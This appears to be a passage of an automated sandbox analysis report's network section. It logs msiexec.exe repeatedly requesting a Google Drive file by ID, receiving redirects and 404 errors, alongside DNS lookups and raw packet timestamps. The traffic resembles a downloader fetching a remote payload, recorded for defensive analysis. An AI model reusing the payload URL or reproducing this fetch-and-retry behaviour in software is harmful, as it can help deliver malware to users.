                                                                Jan 11, 2025 04:36:05.611952066 CET51658443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:05.611972094 CET44351658142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:05.611999989 CET44351658142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:05.612034082 CET51658443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:05.612061024 CET51658443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:05.612864971 CET51658443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:05.612883091 CET44351658142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:15.661236048 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:15.661287069 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:15.661362886 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:15.661711931 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:15.661722898 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.315690994 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.315774918 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.318353891 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.318434000 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.319789886 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.319799900 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.320096970 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.320149899 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.320386887 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.363326073 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.700010061 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.700114965 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.700134039 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.700181961 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.700277090 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.700305939 CET44351659142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:16.700350046 CET51659443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:16.712157965 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:16.712204933 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:16.712275982 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:16.712537050 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:16.712544918 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.369136095 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.370527983 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.370975018 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.370985031 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.371135950 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.371141911 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.805804968 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.805957079 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.805986881 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.806005955 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.806037903 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806046009 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.806056023 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806097984 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806102991 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.806140900 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806189060 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:17.806411028 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806839943 CET51660443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:17.806854010 CET44351660142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:27.828051090 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:27.828110933 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:27.828205109 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:27.828474998 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:27.828495026 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.459830046 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.459995985 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.462516069 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.462608099 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.464323044 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.464334965 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.465306997 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.468463898 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.468883991 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.511343002 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.848339081 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.849208117 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.849292040 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.849313021 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.849459887 CET51661443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:28.849478960 CET44351661142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:28.871156931 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:28.871198893 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:28.871277094 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:28.871546984 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:28.871557951 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.516614914 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.516709089 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.543418884 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.543430090 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.543595076 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.543598890 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965455055 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965609074 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.965641022 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965662003 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965693951 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.965701103 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965711117 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.965751886 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.965756893 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965799093 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.965826988 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:29.965879917 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.966424942 CET51662443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:29.966439962 CET44351662142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:39.983915091 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:39.983971119 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:39.984129906 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:39.984385014 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:39.984404087 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:40.728321075 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:40.728414059 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:40.728960991 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:40.728971958 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:40.729079962 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:40.729085922 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:41.122747898 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:41.122874022 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:41.122890949 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:41.122927904 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:41.122960091 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:41.123054028 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:41.123336077 CET51663443192.168.2.5142.250.181.238
                                                                Jan 11, 2025 04:36:41.123356104 CET44351663142.250.181.238192.168.2.5
                                                                Jan 11, 2025 04:36:41.137492895 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.137541056 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:41.137613058 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.137836933 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.137854099 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:41.779450893 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:41.779593945 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.780173063 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.780188084 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:41.780365944 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:41.780373096 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216026068 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216206074 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216212988 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.216236115 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216278076 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.216321945 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.216329098 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216382027 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.216392994 CET44351664142.250.185.225192.168.2.5
                                                                Jan 11, 2025 04:36:42.216497898 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.217195034 CET51664443192.168.2.5142.250.185.225
                                                                Jan 11, 2025 04:36:42.217215061 CET44351664142.250.185.225192.168.2.5
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 11, 2025 04:33:58.962757111 CET53606871.1.1.1192.168.2.5
                                                                Jan 11, 2025 04:34:50.521953106 CET6396353192.168.2.51.1.1.1
                                                                Jan 11, 2025 04:34:50.529300928 CET53639631.1.1.1192.168.2.5
                                                                Jan 11, 2025 04:34:51.620888948 CET6290253192.168.2.51.1.1.1
                                                                Jan 11, 2025 04:34:51.627969027 CET53629021.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 11, 2025 04:34:50.521953106 CET192.168.2.51.1.1.10x79b7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 04:34:51.620888948 CET192.168.2.51.1.1.10x34aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 11, 2025 04:34:50.529300928 CET1.1.1.1192.168.2.50x79b7No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 04:34:51.627969027 CET1.1.1.1192.168.2.50x34aNo error (0)drive.usercontent.google.com142.250.185.225A (IP address)IN (0x0001)false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.551645142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:34:51 UTC216OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2025-01-11 03:34:51 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:34:51 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-TnSgYOnBkE9QZb9ISAyjSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.551646142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:34:52 UTC258OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-01-11 03:34:52 UTC2219INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRX17UL1fI3hB9uxb9tb8WTFUeOuyCytY7JLGw-4cNACo3RW9cbLSYAep7ywKG2842v
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:34:52 GMT
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-s5g4_WbCwxZQRYwKrI0HIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Set-Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p; expires=Sun, 13-Jul-2025 03:34:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:34:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 46 4b 31 68 57 45 62 44 33 7a 71 7a 46 34 64 34 4f 72 63 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MFK1hWEbD3zqzF4d4OrcgA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.551647142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:03 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:03 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:03 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ynUmWpu9KhLjiNt7JPbH6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.551648142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:04 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:35:04 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT8Vmv0AlaY1BllZklbRFNltP7n0ZDbTXue7bv3YGLhpZ1CXjcphwpQoS-1jH48m8gQ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:35:04 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-EK_7LpaHiczjIpREZw8K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:35:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4f 2d 51 6c 58 4b 4e 32 52 57 39 33 47 37 42 52 35 46 78 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xO-QlXKN2RW93G7BR5FxZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.551649142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:35:15 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
